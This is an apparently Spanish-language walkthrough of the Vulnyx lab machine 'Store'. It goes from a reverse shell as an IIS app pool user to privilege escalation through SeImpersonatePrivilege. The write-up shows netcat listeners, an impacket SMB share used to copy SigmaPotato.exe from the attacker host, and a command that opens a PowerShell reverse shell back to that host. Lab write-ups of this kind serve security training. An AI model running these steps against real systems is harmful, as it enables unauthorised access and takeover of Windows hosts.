Máquina Store (Vulnyx)
Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.52
En nuestra terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat (nc) nos ponemos a la escucha por el puerto 443 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:
$ nc -lvnp 443
Ejecutamos el exploit de la siguiente manera:
Obtenemos una shell.
Identificamos la versión del Sistema Operativo, para ello ejecutamos el siguiente comando:
c:> systeminfo
A continuación, identificamos el usuario y los privilegios, para ello ejecutamos el siguiente comando:
c:> whoami /all
Como podemos ver somos el usuario iis apppool, y tenemos el privilegio SeImpersonatePrivilege activado, siendo este un privilegio de Windows que otorga a un usuario o proceso la capacidad de suplantar el contexto de seguridad de otro usuario o cuenta, por lo tanto, nos descargamos la herramienta SigmaPotato para explotar este privilegio.
Nos pasamos el ejecutable a la Máquina Victima a través del protocolo SMB (445) con la ayuda de la herramienta impacket-smbserver, para ello desde nuestra Máquina Atacante en el directorio donde se encuentra descargada la herramienta ejecutamos el siguiente comando:
$ impacket-smbserver share $(pwd) -smb2support
En la Máquina Victima nos descargamos la herramienta, para ello ejecutamos el siguiente comando:
c:\Windows\Temp> copy \\10.0.2.4\share\SigmaPotato.exe
A continuación, en nuestra terminal de nuestra Máquina Atacante y con la ayuda de la herramienta de netcat (nc) nos ponemos a la escucha por el puerto 4444 por donde vamos a recibir la conexión, para ello ejecutamos el siguiente comando:
$ nc -lvnp 4444
Ejecutamos la herramienta en la Máquina Victima para establecer una shell inversa de PowerShell, para ello ejecutamos el siguiente comando:
c:\Windows\Temp> .\SigmaPotato.exe --revshell 10.0.2.4 4444










